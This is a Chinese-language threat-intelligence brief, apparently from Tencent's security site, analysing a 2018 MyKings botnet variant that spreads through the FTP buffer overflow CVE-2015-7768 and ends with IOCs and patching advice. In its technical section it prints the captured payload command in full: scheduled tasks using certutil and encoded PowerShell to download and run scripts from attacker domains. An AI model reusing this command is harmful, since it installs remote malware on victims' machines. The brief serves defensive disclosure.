产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
Mykings僵尸网络最新活动简报
2018-11-30 14:00:55
一、概述
Mykings是著名的僵尸网络,该僵尸网络自2017年出现后,至今仍非常活跃。国内外多家安全公司都对该僵尸网络做过披露,腾讯御见威胁情报中心最新一次披露为9月7号《MyKings僵尸网络最新变种突袭,攻击代码多次加密混淆,难以检测》。
近期,腾讯御见威胁情报中心再次监测到该僵尸网络有了新的变化,开始使用FTP漏洞开始进行传播,感染了诸多学校和企业。此外,部分版本还是依然使用之前的SMB协议进行传播,如永恒之蓝漏洞和SMBClient,该部分具体的分析参见之前的文章。
本次感染依然使用极其复杂的加密和混淆的ps1脚本进行,而且同样无PE文件落地。这也大大增强了免杀能力和安全软件检测的难度。从C&C域名的检测情况来看,该变种的活跃始于11月初,而近期迎来了一波高峰:
二、技术分析
传播样本跟之前的版本一样为高度混淆的ps1脚本:
经过多次去混淆后,样本展开如下:
样本会将内置的编码压缩过的PE文件解码压缩后加载进内存中。
编码压缩过的PE:
加载进内存:
随后调用内置函数ScanIPPort开启现成来扫描开放FTP服务的机器:
一旦发现有开放21端口(FTP)服务的机器就调用加载在内存中的PE文件的main函数,然后同时传入三个参数:IP、21、payload:
内存调用的PE文件经过解码解压缩后发现是一个经过混淆的.net程序
经过混淆后:
该PE主要作用是进一步组装payload,并且匿名登录FTP服务器,并发送payload。对其经过抓包分析发现,该payload发送的是一个超长的CWD命令:
经过进一步的分析发现,该payload为使用CVE-2015-7768漏洞进行攻击的存在该漏洞的FTP服务器。在代码上与公开的漏洞利用代码相似。
CVE-2015-7768:Konica Minolta FTP Utility 1.0在解析CWD命令时,检查输入大小失败,在实现上存在缓冲区溢出漏洞,远程攻击者通过较长的CWD命令,利用此漏洞可执行任意代码:
我们对该payload进一步分析发现,该payload会执行一系列的cmd指令:
执行指令:
cmd.exe /c schtasks /create /scMINUTE /mo 55 /st 08:00:00 /tn CACHE /tr "cmd /c cd %temp%&certutil.exe -urlcache -split -f http://cache.abauit.com/cache.dat?vf_%COMPUTERNAME%p.dat&certUtil -f -decode p.datp.bat&p.bat&delp.dat p.bat&exit" /F&schtasks /create /sc MINUTE /mo 50 /st 07:05:00 /tn PerfTrack /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBhAGIAYQB1AGkAdAAuAGMAbwBtAC8AcAA/AGYAdgAnACkA"/F.Q6u32E2RbTRuSDayPlepFMcV5p6Mu4aue3ROQtSUwP2PtnQt3QD4epRPTnQrE1CD6FBPvNcRSQptuvpd1urLwPT06NCTe1rTQ0BPVNU2QqD4wVqu3He9sDTbEptoW6UvSCcSQxPtu1D3bKSCEpFOQst21upaadQuGPFOt3U3a0pM3y2nF5Rt0EGP4o2MpoGPp5DpgPVOSCT4Ep6PdwFZfP05ujvPDpwP6O2T0nq0V00eD20fcdsBcQqsPkQ0FO3DBRep4bpppobW2E3Bqcph0eRLrLupfMpnpoD0UpVMU5pp10U2qiT0pacCCCgPdmrEUpscPQbbg6aQBfSWQQBi71W1rO71SugDsqaJpQrbGCg13sDp712t1gcrSY2abgROsqRzf1SrSZRabh61sqbi2aW2bow177PUrapdraG1bUSqBfasBaQJf1aRpicqG5bmCqQrg1crt0QQw7aEbaE2Pgg24psq0C0k3qPL2G3rBK2aqW7HCqpdD7RbSEQQSwCGCqBBsG0BPhBaw7pQqQRCd7bbP0cqg8PISqe12q1R0ura2gPcaQbkBa71bNraPGu771qtCqaRvPsqqXQQraBou7Ba2V1QqSDx1Qf9CGRb2KaQ0GgDbarlE7rbcXra2gW9aQsirqW25a1QPGPkra3TSqBarUW1rg0M3qu23GG2CDw10C6XW10cQQ71FO2a2g69aQ1tBGQQPnSqQS2K3qfB5pFOsvS0AA
执行后,会发送本机的信息到作者服务器,然后执行感染脚本。
三、总结:
Mykings僵尸网络是近年来做活跃的僵尸网络之一,僵尸网络会继续传播挖矿木马,DDoS攻击,传播RAT盗取资料等。虽然从近期的检测来看并未有实质性的恶意动作,但是我们不排除该僵尸网络会随时爆发来进行恶意的攻击,切忌不可掉以轻心。此外,腾讯御见威胁情报中心还会继续持续不断的监控该僵尸网络,保护网民的安全。
四、安全建议
1、 及时打补丁,包括系统补丁和所用软件的补丁;
2、 关闭不必要的端口,方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html;
3、 建议局域网用户切勿使用弱口令和统一口令;
4、 推荐企业用户使用御点终端安全管理系统保护电脑安全(下载地址:https://s.tencent.com/product/yd/index.html)
五、IOCs
http://cache.abauit.com
http://p.abauit.com
参考资料
MyKings僵尸网络最新变种突袭,攻击代码多次加密混淆,难以检测
https://mp.weixin.qq.com/s/GJ4ilPNpe7NPevw4MHP0iw
MyKings僵尸网络的新动向:利用NSIS脚本挖门罗币
https://mp.weixin.qq.com/s/bgOLZIAcVw5ElN0Szc5Xyg
在线咨询
方案定制